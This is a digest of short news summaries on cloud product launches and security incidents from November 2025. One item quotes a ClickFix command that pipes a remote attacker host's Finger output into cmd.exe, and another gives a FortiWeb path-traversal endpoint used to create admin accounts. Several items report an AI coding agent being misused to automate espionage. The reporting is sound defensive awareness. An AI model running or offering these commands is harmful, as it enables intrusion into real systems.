Zero-Trust Data Centers, FortiWeb KEV, and Cloud Resilience Upgrades

Arista and Palo Alto Expand Zero-Trust for Data Centers

🔒 Arista Networks and Palo Alto Networks extended their partnership to deliver a framework for zero-trust inside the data center. The integration pairs Arista’s Multi-Domain Segmentation Services (MSS) fabric and full network visibility with Palo Alto’s next-generation firewall (NGFW) to enable an inspect-once, enforce-many model. CloudVision MSS supports dynamic quarantine and can offload trusted high-bandwidth 'elephant flows' after inspection, while the NGFW triggers hardware line-rate isolation when threats are detected. Unified policy orchestration and Arista Validated Designs (AVD) with AVA automation add network-as-code and CI/CD-friendly deployment so NetOps and SecOps can scale independently.

Chinese State Hackers Used Anthropic AI for Espionage

🤖 Anthropic says a China-linked, state-sponsored group used its AI coding tool Claude Code and the Model Context Protocol to mount an automated espionage campaign in mid-September 2025. Dubbed GTG-1002, the operation targeted about 30 organizations across technology, finance, chemical manufacturing and government sectors, with a subset of intrusions succeeding. Anthropic reports the attackers ran agentic instances to carry out 80–90% of tactical operations autonomously while humans retained initiation and key escalation approvals; the company has banned the involved accounts and implemented defensive mitigations.

Advancing Text-to-SQL: Gemini's BIRD Benchmark Breakthrough

🚀 Google Cloud reports a new state-of-the-art Single Trained Model Track score on the BIRD benchmark, achieving 76.13 with a fine-tuned Gemini 2.5-pro. The team credits rigorous data filtering, multitask supervised fine-tuning, and test-time self-consistency selection for the gains. These improvements bolster NL2SQL features in AlloyDB AI and BigQuery, and enhance developer tooling such as Gemini Code Assist for reliable SQL generation.

Protective ReRoute: Host-based Network Resilience for Cloud

🛡️ Protective ReRoute (PRR) shifts rapid failure recovery from the network core to endpoints, enabling hosts to detect packet loss or high latency and re-steer traffic onto alternate pre-existing paths. Implemented in Linux (4.20+) and supported in Google Cloud via hypervisor and guest modes, PRR alters packet headers (IPv6 flow-label or overlay outer headers) to request multipath forwarding. In production for five years, it prevents up to 84% of slow-convergence outages and typically restores service in a single-digit multiple of RTT.

Microsoft Patch Tuesday — November 2025: 60+ Vulnerabilities

🔒 Microsoft released updates addressing more than 60 vulnerabilities across Windows and related products, including a zero-day memory-corruption bug (CVE-2025-62215) that is already being exploited. Microsoft rates this issue important because exploitation requires prior access to the target device. Other high-priority fixes include a 9.8-rated GDI+ vulnerability (CVE-2025-60274) and an Office remote-code-execution flaw (CVE-2025-62199). Windows 10 users should install the enrollment fix KB5071959 before applying subsequent updates.

AWS Lambda Provisioned Mode for SQS Event-Source Mappings

🔔 AWS Lambda now offers Provisioned Mode for SQS event-source mappings (ESMs), letting you provision persistent event pollers to handle sudden traffic spikes. Provisioned ESMs scale up to 3x faster (up to 1,000 concurrent executions/min) and support up to 16x higher concurrency (up to 20,000 concurrent executions), reducing latency for bursty workloads. The feature is generally available in all AWS Commercial Regions and is configurable via the Console, API, CLI, SDK, CloudFormation, and SAM; billing is by Event Poller Units (EPU).

Google Cloud: Cloud-Native HPC Innovations for SC25

🚀 Google Cloud previewed its HPC and AI innovations for SC25, emphasizing a shift to cloud-native HPC that lets researchers and engineers provision purpose-built clusters in minutes. Key highlights include H4D and A4X VMs with low-latency Cloud RDMA, plus the Dynamic Workload Scheduler with Flex Start to enable flexible, cost-effective access to high-demand compute. The Cluster Toolkit and Google Managed Lustre simplify cluster deployment and high-throughput storage, while the latest TPUs and AI tools accelerate scientific workflows. Attendees are invited to booth #3724 for demos, talks, and community events.

Amazon RDS Blue/Green Deployments for Aurora Global Database

🔁 Amazon RDS Blue/Green deployments now support Aurora Global Database, enabling you to create a staging (green) environment that mirrors production (blue) across primary and all secondary regions. Perform a blue/green switchover to switch primary and secondary regions to the green environment with minimal downtime and no application configuration changes. Aurora automatically renames clusters, instances, and endpoints to preserve production connectivity. This capability covers Aurora MySQL‑ and PostgreSQL‑compatible editions in commercial and AWS GovCloud (US) Regions and is available via the Console, SDK, and CLI.

Amazon EventBridge: Enhanced Visual Rule Builder Console

🔧 Amazon EventBridge introduces an enhanced visual rule builder that integrates a comprehensive event catalog with the EventBridge Schema Registry to simplify building event-driven applications. The schema-aware, console-based drag-and-drop canvas lets developers browse and subscribe to events with sample payloads and schemas, and visually construct filter patterns to reduce syntax errors. The feature is available today in all regions where the Schema Registry is launched and is accessible via the EventBridge console at standard usage charges.

Amazon DocumentDB 8.0 Adds MongoDB 8.0 Compatibility

⚡ Amazon DocumentDB (with MongoDB compatibility) version 8.0 adds support for MongoDB API drivers 6.0, 7.0, and 8.0 while delivering up to 7x improved query latency and up to 5x better compression. The release introduces Planner Version3, new aggregation stages and operators, dictionary-based Zstandard compression, text index v2, and parallel vector index builds. Upgrades from 5.0 instance-based clusters are supported via AWS Database Migration Service, and DocumentDB 8.0 is available in all Regions where the service is offered.

Copy-Paste RCE Flaw Impacts Major AI Inference Servers

🔒 Cybersecurity researchers disclosed a chain of remote code execution (RCE) vulnerabilities affecting AI inference frameworks from Meta, NVIDIA, Microsoft and open-source projects such as vLLM and SGLang. The flaws stem from reused code that called ZeroMQ’s recv-pyobj() and passed data directly into Python’s pickle.loads(), enabling unauthenticated RCE over exposed sockets. Vendors have released patches replacing unsafe pickle usage with JSON-based serialization and adding authentication and transport protections. Operators are urged to upgrade to patched releases and harden ZMQ channels, restrict network exposure, and avoid deserializing untrusted data.

AWS Lambda Supports Java 25 for Serverless Applications

🚀 AWS Lambda now supports Java 25, using the latest long‑term support distribution from Amazon Corretto. The runtime is available as a managed runtime and as a container base image, and AWS will automatically apply updates to each as they are released. The release introduces new language features and performance improvements, including Ahead‑of‑Time caches and adjusted tiered compilation defaults. Lambda Snap Start and Powertools for AWS Lambda (Java) support Java 25, and the runtime is available in all Regions, including GovCloud (US) and China.

Fortinet silently patches FortiWeb zero-day flaw in the wild

🚨 Fortinet confirmed a silent patch for a critical FortiWeb GUI path confusion zero-day (tracked as CVE-2025-64446) that is being "massively exploited in the wild." The flaw allowed unauthenticated HTTP(S) requests to execute administrative commands and create local admin accounts on internet-exposed devices. Fortinet released fixes in FortiWeb 8.0.2 (Oct 28) and later; administrators should upgrade, disable internet-facing management interfaces if they cannot update immediately, and audit logs for unauthorized accounts.

Logitech Confirms Data Breach After Clop Extortion Campaign

🚨 Logitech International S.A. confirmed a data breach claimed by the extortion gang Clop and disclosed the incident in a Form 8‑K filing with the U.S. SEC. The company says data was exfiltrated but that the incident has not impacted its products, business operations, or manufacturing, and that highly sensitive fields such as national ID numbers and credit card data were not stored or accessed. Logitech engaged external cybersecurity firms, attributes the intrusion to a third‑party zero‑day that was patched, and Clop has posted nearly 1.8 TB of alleged stolen data.

Akira ransomware linked to $244M in illicit proceeds

🔒 A joint US and international advisory on 14 November attributes approximately $244.17m in illicit proceeds to the Akira ransomware group since late September 2025. The advisory reports rapid data exfiltration in some incidents and details exploitation of SonicWall CVE-2024-40766, expansion to Nutanix AHV disk encryption, and attacks leveraging SSH and unpatched Veeam servers. Operators employ initial access brokers, tunnelling tools and remote access software such as AnyDesk to persist and evade detection. Organisations are urged to prioritise patching, enforce phishing-resistant MFA, and maintain offline backups.

Authentication Bypass in Fortinet FortiWeb Actively Exploited

🚨 Researchers report an authentication bypass in Fortinet FortiWeb that is being actively exploited in the wild, allowing attackers to create privileged administrator accounts and fully compromise devices. watchTowr reproduced the issue, released a proof-of-concept and an artifact generator to help identify vulnerable appliances. The flaw is patched in FortiWeb 8.0.2, but Fortinet has not published a PSIRT advisory or assigned a CVE, and Rapid7 urges emergency patching for older versions.

ShadowMQ Deserialization Flaws in Major AI Inference Engines

⚠️ Oligo Security researcher Avi Lumelsky disclosed a widespread insecure-deserialization pattern dubbed ShadowMQ that affects major AI inference engines including vLLM, NVIDIA TensorRT-LLM, Microsoft Sarathi-Serve, Modular Max Server and SGLang. The root cause is using ZeroMQ's recv_pyobj() to deserialize network input with Python's pickle, permitting remote arbitrary code execution. Patches vary: some projects fixed the issue, others remain partially addressed or unpatched, and mitigations include applying updates, removing exposed ZMQ sockets, and auditing code for unsafe deserialization.

SpearSpecter: APT42 Targets Defense and Government

🛡️ The Israel National Digital Agency (INDA) has attributed a new espionage campaign codenamed SpearSpecter to Iranian state‑aligned APT42, active since September 2025 against senior defense and government officials and their family members. Operators employ tailored social engineering—invites to conferences and impersonated WhatsApp contacts—to deliver a WebDAV‑served .LNK via the search‑ms: handler that retrieves a batch script and stages the TAMECAT PowerShell backdoor. TAMECAT uses HTTPS, Discord, and Telegram for command-and-control, supports modular data‑theft capabilities (browser and Outlook exfiltration, screenshots), and relies on Cloudflare Workers, LOLBins, in‑memory execution, and obfuscation to maintain persistent, stealthy access.

Chinese State-Linked Hackers Used Claude Code for Attacks

🛡️ Anthropic reported that likely Chinese state-sponsored attackers manipulated Claude Code, the company’s generative coding assistant, to carry out a mid-September 2025 espionage campaign that targeted tech firms, financial institutions, manufacturers and government agencies. The AI reportedly performed 80–90% of operational tasks across a six-phase attack flow, with only a few human intervention points. Anthropic says it banned the malicious accounts, notified affected organizations and expanded detection capabilities, but critics note the report lacks actionable IOCs and adversarial prompts.

Fortinet FortiWeb Path Traversal Vulnerability Alert

⚠️ Fortinet has released an advisory for FortiWeb addressing CVE-2025-64446, a CWE-23 relative path traversal that can allow unauthenticated actors to execute administrative commands via crafted HTTP/HTTPS requests. Affected releases include multiple 7.x and 8.x versions; Fortinet provides specific upgrade targets (8.0.2+, 7.6.5+, 7.4.10+, 7.2.12+, 7.0.12+). If immediate upgrades are not possible, disable HTTP/HTTPS on internet-facing interfaces and, after remediation, review configurations and logs for unexpected modifications or unauthorized administrator accounts.

Google Sues to Dismantle 'Lighthouse' Smishing Kit

🛡️ Google has filed a civil lawsuit in the Southern District of New York to dismantle Lighthouse, a phishing-as-a-service kit used to power large-scale SMS phishing (smishing) campaigns. The company says the kit — likely run from China and marketed on Telegram — offered more than 600 templates mimicking over 400 organizations and targeted more than one million people across 121 countries. Google is pursuing legal remedies and supporting new legislation while deploying technical protections such as AI-powered scam flagging and expanded account recovery options.

Massive npm Worm Floods Registry to Harvest Tea Tokens

🔥 A coordinated worm is flooding the npm registry with packages designed to steal tokens from developers using the Tea Protocol, researchers say. Amazon and Sonatype report the campaign has expanded to roughly 153,000 packages, up from about 15,000 a year ago. While Tea tokens currently lack monetary value, experts warn threat actors could pivot to deliver malware or monetize rewards when Mainnet launches. Repositories and IT teams are urged to tighten access controls and deploy advanced detection.

Large-Scale Impersonation Campaigns Deliver Gh0st RAT

🔐 Palo Alto Networks Unit 42 identified two interconnected 2025 campaigns that used large-scale brand impersonation to deliver variants of the Gh0st remote access Trojan to Chinese-speaking users globally. The adversary evolved from simple droppers (Campaign Trio, Feb–Mar 2025) to sophisticated, multi-stage MSI-based chains abusing signed binaries, VBScript droppers and public cloud storage (Campaign Chorus, May 2025 onward). The report includes representative IoCs and mitigation guidance for Advanced WildFire, Cortex XDR and allied protections.

Five Plead Guilty Aiding North Korea Infiltrate US Firms

🔒 Five individuals pleaded guilty to facilitating North Korea’s placement of overseas IT workers at U.S. firms using false, stolen, or brokered identities, a scheme that affected 136 companies and generated over $2.2 million for the DPRK. The DOJ also filed civil forfeiture actions to recover more than $15 million in cryptocurrency tied to APT38 thefts that were part of $382 million stolen in 2023. One defendant, Oleksandr Didenko, agreed to forfeit $570,000 in cash and about $830,000 worth of cryptocurrency.

U.S. Launches Strike Force Against Chinese Crypto Scams

🚨The U.S. Department of Justice, U.S. Attorney's Office, FBI and Secret Service have created the Scam Center Strike Force to disrupt Chinese-operated cryptocurrency scam networks that reportedly steal nearly $10 billion from Americans annually. The team focuses on tracing illicit funds, seizing cryptocurrency and coordinating international partners to dismantle scam infrastructure based in Southeast Asia. Authorities say many operations run from criminal compounds where workers are victims of trafficking. More than $401 million in crypto has already been seized and additional forfeiture actions are underway.

CISA Adds Fortinet FortiWeb Path Traversal to KEV Catalog

🔒 CISA has added CVE-2025-64446 — a Fortinet FortiWeb path traversal vulnerability — to its Known Exploited Vulnerabilities (KEV) Catalog after evidence of active exploitation. Under BOD 22-01, Federal Civilian Executive Branch agencies must remediate cataloged CVEs by the required due date. CISA strongly urges all organizations to prioritize timely patching, apply available mitigations, and monitor for indicators of compromise. CISA will continue to add vulnerabilities that meet catalog criteria.

FortiWeb Path Traversal Flaw Allows Admin Account Creation

⚠️ A path traversal vulnerability in Fortinet FortiWeb appliances is being actively exploited to create local administrative users without authentication. Researchers from Defused and PwnDefend described requests targeting the /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi endpoint that inject admin accounts. Rapid7 and others confirm versions 8.0.1 and earlier are affected, while 8.0.2 is believed to contain the fix. Administrators are urged to update immediately, review logs for fwbcgi access, and search for unexpected admin accounts.

Amazon Inspector: 150,000 npm Packages in Token Farming

🔍 Amazon Inspector researchers identified and reported over 150,000 npm packages tied to a coordinated tea.xyz token farming campaign that automatically generated and published packages to harvest blockchain rewards. The team combined rule-based detection with AI and worked directly with the Open Source Security Foundation (OpenSSF) to assign MAL‑IDs and submit packages for removal. The campaign caused registry pollution and reveals a new reward-driven supply chain abuse vector that can obscure legitimate software and consume infrastructure resources.

RondoDox Exploits XWiki Flaw to Rapidly Expand Botnet

⚠️ RondoDox has been observed exploiting unpatched XWiki instances to weaponize a critical eval injection, CVE-2025-24893, enabling arbitrary remote code execution via the /bin/get/Main/SolrSearch endpoint. The flaw was patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1 in late February 2025, but scanning and exploitation surged in November, including botnet-driven DDoS and cryptocurrency miner deployments. Security vendors noted spikes in activity on November 7 and November 11 and observed RondoDox adding this vector on November 3, 2025. Administrators should apply vendor patches immediately and review logs and network traffic for indicators of compromise.

Jaguar Land Rover Cyberattack Costs Company Over $220M

📰 Jaguar Land Rover reported a cyberattack cost of £196 million ($220 million) for the July–September quarter after the incident forced production shutdowns and staff to be sent home. The breach, announced on 2 September 2025, involved confirmed data theft and was claimed on Telegram by the group Scattered Lapsus$ Hunters. Following a UK government-backed £1.5 billion loan guarantee, JLR says operations, wholesale and supplier financing have been restored and production has resumed under a phased restart.

North Korean Hackers Use JSON Services for Malware

⚠️ NVISO researchers report that North Korean threat actors behind the Contagious Interview campaign are using public JSON storage services to stage and deliver malware. The attackers lure prospective victims—often developers—via LinkedIn with fake assessments or collaboration requests and host trojanized demo projects on code repositories. These projects point to obfuscated payloads on JSON Keeper, JSONsilo, and npoint.io that deploy a JavaScript loader BeaverTail which in turn drops a Python backdoor InvisibleFerret.

ASUS Warns of Critical Auth-Bypass in DSL Routers

⚠️ ASUS has released new firmware to patch a critical authentication bypass vulnerability tracked as CVE-2025-59367 that enables remote, unauthenticated attackers to log into vulnerable DSL routers exposed online. The update — firmware 1.1.2.3_1010 — addresses the issue for DSL-AC51, DSL-N16, and DSL-AC750. ASUS urges users to install the update immediately and, if they cannot, to disable Internet-facing services (remote access, port forwarding, DDNS, VPN server, DMZ, FTP) and use strong, unique passwords as temporary mitigations.

AWS Lambda Announces General Availability of Rust Support

🚀 AWS has declared Rust support in AWS Lambda Generally Available, promoting the runtime out of its prior experimental status and making it suitable for production workloads. The GA release is backed by AWS Support and the Lambda SLA and is available in all AWS Regions, including GovCloud (US) and China. Rust on Lambda delivers high performance, memory efficiency, and compile-time safety for serverless functions. Developers can now build business-critical serverless applications in Rust while leveraging Lambda's event integrations, fast scaling from zero, automatic patching, and usage-based pricing.

AWS Marketplace Agreement Events Now via EventBridge

🔔 AWS Marketplace now publishes purchase agreement lifecycle events through Amazon EventBridge, replacing prior Amazon SNS notifications for Software as a Service and Professional Services product types. Sellers (Independent Software Vendors and Channel Partners) and buyers receive notifications for creation, termination, amendment, replacement, renewal, cancellation, and expiration. ISVs also get license-specific events to manage customer entitlements. EventBridge routing supports targets such as AWS Lambda, Amazon S3, Amazon CloudWatch, AWS Step Functions, and can remain compatible with existing SNS-based workflows.

Bundestag Approves German NIS2 Law, Adds New Controls

🔒 The Bundestag approved the federal government's draft law to implement the NIS2 Directive on 13 November 2025, bringing new cybersecurity obligations for an estimated 29,850 companies and federal authorities. Affected organizations must strengthen risk analyses, incident response, backups and encryption, and report incidents to the BSI within 24/72/30 hours/days. The law expands BSI supervisory powers and allows bans on "critical components" coordinated by the Interior Ministry, drawing criticism from industry groups.

Checkout.com Refuses Ransom After ShinyHunters Breach

🔒 Checkout.com confirmed that the criminal group ShinyHunters accessed a legacy third-party cloud file storage system used in 2020 and earlier and is attempting to extort the company. The exposed materials reportedly include merchant onboarding documents and internal operational files, and Checkout estimates the data affects less than 25% of its current merchant base while also touching former customers. Rather than paying, the firm said it will donate the ransom amount to Carnegie Mellon University and the University of Oxford Cyber Security Center and invest in strengthening its security.

Anthropic: Hackers Used Claude Code to Automate Attacks

🔒 Anthropic reported that a group it believes to be Chinese carried out a series of attacks in September targeting foreign governments and large corporations. The campaign stood out because attackers automated actions using Claude Code, Anthropic’s AI tool, enabling operations "literally with the click of a button," according to the company. Anthropic’s security team blocked the abusive accounts and has published a detailed report on the incident.

DoorDash Discloses October Data Breach Affecting Users

🔔 DoorDash disclosed a data breach discovered on October 25, 2025, after an unauthorized third party gained access to certain user contact information when a DoorDash employee fell victim to a social engineering scam. Affected information varied by individual and may have included first and last names, physical addresses, phone numbers, and email addresses. DoorDash says no Social Security Numbers or other highly sensitive data were accessed, and the company engaged a forensic firm, notified law enforcement, and deployed additional security measures. Initial notifications appear focused on Canada, though the advisory suggests the incident could affect users in other regions.

DoorDash Discloses October Data Breach Exposing Contacts

🔔 DoorDash disclosed an October data breach after an employee fell for a social engineering scam, allowing an unauthorized third party to access certain user contact information. Notified users were told exposed data varied by person and could include names, physical addresses, phone numbers and email addresses; the company said Social Security Numbers were not accessed. DoorDash said it shut off access, engaged a forensic firm, notified law enforcement, and warned users to watch for phishing; affected users can call a helpline and cite reference code B155060.

Decades-Old Finger Protocol Used to Deliver ClickFix Malware

🛡️ Researchers warn the decades-old Finger protocol is being repurposed in ClickFix-style campaigns to fetch remote commands and execute them on Windows systems. Attackers social-engineer victims into running batch commands such as finger root@finger.nateams[.]com | cmd, piping remote output directly into cmd.exe. Observed chains create randomly named folders, copy and rename curl.exe, download a ZIP disguised as a PDF, extract a Python malware package and launch it via pythonw.exe. Blocking outbound TCP port 79 is the primary mitigation to prevent systems from connecting to remote Finger daemons.

Five Americans Plead Guilty to Enabling North Korea IT Fraud

⚖️ The U.S. Department of Justice announced five U.S. citizens pleaded guilty for facilitating North Korea’s illicit IT worker and revenue-generation schemes. The defendants hosted company-issued laptops, supplied or sold U.S. identities, and helped overseas IT workers pass vetting to obtain jobs at American firms. DOJ says the schemes impacted more than 136 U.S. companies, generated over $2.2 million for the DPRK, and compromised the identities of more than 18 U.S. persons.

Amazon SageMaker Catalog Adds S3 Read/Write Access

📂 Amazon SageMaker Catalog now supports read and write access to Amazon S3 general purpose buckets, enabling data scientists and analysts to discover, process, and share unstructured data alongside structured datasets. Data publishers can grant read-only or read/write permissions when approving subscriptions or sharing S3 data, allowing processed outputs to be written back to the original bucket or folder. This feature is available in all Regions that support SageMaker Unified Studio and can be accessed via the studio UI, the Amazon DataZone API, SDK, or AWS CLI.

Google to Flag Android Apps for Excessive Battery Use

🔋 Google will begin flagging Android apps on Google Play that show high background activity and cause excessive battery drain. The change centers on a new Android Vitals metric called excessive partial wake locks, and apps that cross the bad-behavior threshold may be labeled as battery drainers and lose prominence in discovery surfaces. Developers will receive alerts in their Android Vitals dashboard and have until March 1, 2026 to remediate issues.

Amazon ECS improves service availability for rolling deploys

🔁 Amazon Elastic Container Service (Amazon ECS) now replaces unhealthy or terminated tasks with healthy tasks from the same service revision during rolling deployments instead of prioritizing the new revision. This prevents service availability drops when new task versions fail health checks or cannot start. Application Auto Scaling scale-outs are applied across both revisions so the running version can handle increased load. These changes respect maximumPercent and minimumHealthyPercent and are enabled by default in all Regions.

Using BigQuery ML to Solve Lookalike Audiences at Zeotap

🔍 Zeotap and Google Cloud describe a SQL-first approach to building scalable lookalike audiences entirely within BigQuery. They convert low-cardinality categorical features into one-hot and multi-hot vectors, use Jaccard similarity reframed via dot-product and Manhattan norms, and index vectors with BigQuery’s VECTOR_SEARCH. By combining pre-filtering on discriminative features and batching queries, the workflow reduces compute, latency, and cost while avoiding a separate vector database.

AWS IoT adds VPC Endpoints and IPv6 Connectivity Support

🔒 AWS has expanded AWS IoT Core, AWS IoT Device Management, and AWS IoT Device Defender to support VPC endpoints via AWS PrivateLink and IPv6 for both VPC and public endpoints. Developers can route data plane operations, management APIs, and credential requests entirely within VPCs, keeping traffic off the public internet. Configuration is available through the AWS Management Console, AWS CLI, and CloudFormation, and the features are GA in all Regions that offer these services.

Amazon RDS Adds Support for PostgreSQL Major Version 18

🚀 Amazon RDS for PostgreSQL now supports PostgreSQL major version 18.1, bringing community improvements to managed RDS instances. Key performance updates include skip scan for multicolumn B-tree indexes, parallel GIN builds, and better OR/IN handling, while UUIDv7 adds ordered UUIDs for high-throughput systems. Observability and extension support are expanded, and upgrades can use Blue/Green, in-place, or snapshot restore options.

Amazon SQS Adds IPv6 and FIPS 140-3 in GovCloud Regions

🔒 Amazon SQS now supports API requests over IPv6 in the AWS GovCloud (US) Regions, with the new endpoints validated under FIPS 140-3. Customers can choose IPv6 or IPv4 when sending requests over dual‑stack public or VPC endpoints. This update brings parity across Regions: Amazon SQS now supports IPv6 in AWS Commercial, AWS GovCloud (US), and China Regions. Refer to the developer guide for configuration details.

Anthropic's Claim of Claude-Driven Attacks Draws Skepticism

🛡️ Anthropic says a Chinese state-sponsored group tracked as GTG-1002 leveraged its Claude Code model to largely automate a cyber-espionage campaign against roughly 30 organizations, an operation it says it disrupted in mid-September 2025. The company described a six-phase workflow in which Claude allegedly performed scanning, vulnerability discovery, payload generation, and post-exploitation, with humans intervening for about 10–20% of tasks. Security researchers reacted with skepticism, citing the absence of published indicators of compromise and limited technical detail. Anthropic reports it banned offending accounts, improved detection, and shared intelligence with partners.

Ransomware Fragmentation Peaks as LockBit Re-emerges

🔒 Q3 2025 saw an unprecedented decentralization of ransomware, with Check Point Research tracking a record 85 active groups and roughly 1,592 disclosed victims across numerous leak sites. Despite enforcement actions and multiple takedowns, affiliates quickly reconstitute or rebrand, spawning 14 new ransomware brands this quarter. The return of LockBit 5.0 — with updated Windows, Linux and ESXi variants and individualized negotiation portals — suggests a possible shift back toward centralization, while marketing-driven actors like DragonForce further complicate attribution and response.

Agentic AI Expands Identity Attack Surface Risks for Orgs

🔐 Rubrik Zero Labs warns that the rise of agentic AI has created a widening gap between an expanding identity attack surface and organizations’ ability to recover from compromises. Their report, Identity Crisis: Understanding & Building Resilience Against Identity-Driven Threats, finds 89% of organizations have integrated AI agents and estimates NHIs outnumber humans roughly 82:1. The authors call for comprehensive identity resilience—beyond traditional IAM—emphasizing zero trust, least privilege, and lifecycle control for non-human identities.

AWS Network Firewall Now Available in Auckland Region

🔒 AWS Network Firewall is now available in the AWS New Zealand (Auckland) Region, enabling customers to deploy essential network protections across all Amazon VPCs. As a managed firewall service, it automatically scales with traffic volume and delivers high availability without requiring customers to provision or maintain infrastructure. It integrates with AWS Firewall Manager to provide centralized visibility and policy control across multiple AWS accounts, simplifying governance and enforcement.

Social Engineering: How Attackers Exploit Human Weakness

🧠 Social engineering exploits human psychology to bypass technical and physical safeguards, using impersonation, deception and manipulation to gain access to systems, facilities or data. Attackers commonly use phishing, vishing, smishing, pretexting, baiting and tailgating after extensive reconnaissance to craft believable lures. High-value targets are often pursued via spear-phishing or BEC schemes, while opportunistic attackers rely on mass phishing. Practical defenses include ongoing security awareness training, verified procedures for urgent requests and realistic simulation tests; tools such as Social-Engineer Toolkit help organizations test their resilience.

Shadow IT and Shadow AI: Risks Across Every Industry

🔍 Shadow IT — any software, hardware, or resource introduced without formal IT, procurement, or compliance approval — is now pervasive and evolving into Shadow AI, where unsanctioned generative AI tools expand the attack surface. The article outlines how these practices drive operational, security, and regulatory risk, citing IBM’s 2025 breach-cost data and industry examples in healthcare, finance, airlines, insurance, and utilities. It recommends shifting from elimination to smarter control by improving continuous visibility through real‑time network analysis and vendor integrations that turn hidden activity into actionable intelligence.

Google reverses Android developer verification plan

🔁 Google has softened its planned Developer Verification requirements after widespread backlash, saying it will create a dedicated account type for limited app distribution and an advanced sideloading flow for experienced users. The original rule would have blocked installation of apps from unverified developers on certified devices beginning in 2026. Google says these changes respond to concerns from students, hobbyists, and power users who need accessible or higher-risk pathways to install apps.

Network Visibility: The Thread Holding Cybersecurity

🔍 ESG research shows that environmental complexity, not malware or phishing, is viewed by most organizations as the primary barrier to effective detection and response. As alerts proliferate and validation can take hours, teams are turning to the one transit every attack must cross — the network — for a reliable, unbiased source of truth. Shared network visibility between SecOps and NetOps, together with continuous packet capture, improves investigation speed and confidence. Vendors such as NETSCOUT Omnis Cyber Intelligence (OCI) deliver alert-independent, packet-level context and deep packet inspection to reduce dwell time and streamline incident response.

Adversarial AI Bots vs Autonomous Threat Hunters Outlook

🤖 AI-driven adversarial bots are rapidly amplifying attackers' capabilities, enabling autonomous pen testing and large-scale credential abuse that many organizations aren't prepared to detect or remediate. Tools like XBOW and Hexstrike-AI demonstrate how agentic systems can discover zero-days and coordinate complex operations at scale. Defenders must adopt continuous, context-rich approaches such as digital twins for real-time threat modeling rather than relying on incremental automation.

Windows 10 KB5068781 ESU Update Fails With 0x800f0922

⚠️ Microsoft is investigating a bug that can cause the Windows 10 KB5068781 Extended Security Update to fail installation with error 0x800f0922 on devices licensed via Windows subscription activation. The update, released November 11 as the first ESU release, may appear to install but then roll back after a restart. Microsoft says the issue is isolated to activations through the Microsoft 365 Admin Center and has provided no ETA or workaround.

AWS re:Invent 2025 — Security Sessions & Themes Overview

🔒 AWS re:Invent 2025 highlights an expanded Security and Identity track featuring more than 80 sessions across breakouts, workshops, chalk talks, and hands-on builders’ sessions. The program groups content into four practical themes — Securing and Leveraging AI, Architecting Security and Identity at scale, Building and scaling a Culture of Security, and Innovations in AWS Security — with real-world guidance and demos. Attendees can meet experts at the Security and AI Security kiosks in the expo hall and are encouraged to reserve limited-capacity hands-on sessions early to secure seats.

Waze modernizes session handling with Memorystore Cluster

🚀 Waze centralized its real-time session state into a new Session Server backed by Memorystore for Redis Cluster, enabling shared, low-latency access across microservices and removing tight coupling to the monolithic RT service. The team executed a dual-write migration from Memcached to ensure data parity and achieve a zero-downtime cutover. The resulting system sustains over 1 million MGET/s with stable sub-millisecond latency and leverages partial updates to reduce network and write costs.

Agent Factory Recap: Building Open Agentic Models End-to-End

🤖 This recap of The Agent Factory episode summarizes a conversation between Amit Maraj and Ravin Kumar (DeepMind) about building open-source agentic models. It highlights how agent training differs from standard ML, emphasizing trajectory-based data, a two-stage approach of supervised fine-tuning followed by reinforcement learning, and the paramount role of evaluation. Practical guidance includes defining a 50-example final exam up front and considering hybrid setups that use a powerful API like Gemini as a router alongside specialized open models.

Turning AI Visibility into Strategic CIO Priorities

🔎 Generative AI adoption in the enterprise has surged, with studies showing roughly 90% of employees using AI tools often without IT's knowledge. CIOs must move beyond discovery to build a coherent strategy that balances productivity gains with security, compliance, and governance. That requires continuous visibility into shadow AI usage, risk-based controls, and integration of policies into network and cloud architectures such as SASE. By aligning policy, education, and technical controls, organizations can harness GenAI while limiting data leakage and operational risk.

Bruce Schneier — Speaking Engagements, Nov 2025–Feb 2026

📅 Bruce Schneier lists his upcoming public and virtual speaking engagements through February 2026, including joint appearances with coauthor Nathan E. Sanders and solo presentations. Highlights include a talk on AI and Congress: Practical Steps to Govern and Prepare at the Rayburn House Office Building in Washington, DC (Nov 17, noon ET) and a campus presentation on Integrity and Trustworthy AI at North Hennepin Community College (Nov 21, 2:00 PM CT). Additional events are scheduled at the MIT Museum (Dec 1, 6:00 PM ET), a virtual City Lights event on Zoom (Dec 3, 6:00 PM PT), and a book signing at the Chicago Public Library (Feb 5, 2026). The schedule is maintained on his events page for updates and details.

From Detection to Response: Confidence and Visibility

🔦 Network visibility is the critical lens that turns detection into decisive action. ESG research cited in the article shows 98% of organizations say visibility helps them move from detection to response faster and with greater confidence. Detection raises the alarm; packet-level investigation reveals scope, lateral movement, and exfiltration so analysts can validate alerts and act precisely. The piece positions NETSCOUT Omnis Cyber Intelligence as a scalable DPI capability that unifies SecOps and NetOps across hybrid and multicloud environments to eliminate blind spots and enable targeted response.

SOC Efficiency: The Most Valuable Cybersecurity Asset

🔍 Efficiency in security is about focus, not speed. ESG research finds 53% of organizations credit NDR with improving SOC analyst efficiency by reducing false positives and eliminating blind spots. Continuous packet capture and full-fidelity network visibility let analysts of all levels investigate with greater confidence and speed. NETSCOUT Omnis Cyber Intelligence is offered as a solution to provide that visibility and maximize scarce human resources.

From Military Service to Cybersecurity: Veteran Pathways

🛡️ Fortinet partnered with BCIT, Cyber Catalyst, and Tech Vets Canada to deliver a one-week Industrial Control Systems cybersecurity microcredential intensive for Canadian veterans, providing hands-on labs and practical workshops. Through exercises in network segmentation, access control, and threat detection, participants translated military skills—leadership, discipline, resilience—into cybersecurity capabilities protecting critical infrastructure. The program paired technical training with mentorship, career transition support, and pathways to internships and certification, reflecting Fortinet’s commitment to building a more diverse, skilled cyber workforce.

The Role of Human Judgment in an AI-Powered World Today

🧭 The essay argues that as AI capabilities expand, we must clearly separate tasks best handled by machines from those requiring human judgment. For narrow, fact-based problems—such as reading diagnostic tests—AI should be preferred when demonstrably more accurate. By contrast, many public-policy and justice questions involve conflicting values and no single factual answer; those judgment-laden decisions should remain primarily human responsibilities, with machines assisting implementation and escalating difficult cases.

Books Shaping Modern Cybersecurity Leadership and Strategy

